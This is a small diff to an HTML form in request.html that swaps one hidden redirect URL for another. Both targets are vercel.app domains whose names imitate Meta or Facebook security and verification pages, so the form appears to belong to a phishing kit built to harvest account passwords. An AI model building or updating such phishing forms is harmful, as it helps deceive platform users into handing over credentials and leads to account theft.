--- a/request.html
+++ b/request.html
@@ -229,7 +229,7 @@
  <input
     type="hidden"
     name="_redirect"
-    value="https://meta-fb-security-password.vercel.app/"
+    value="https://meta-verified-pass.vercel.app/"
   />
          
          <div class=form-group>
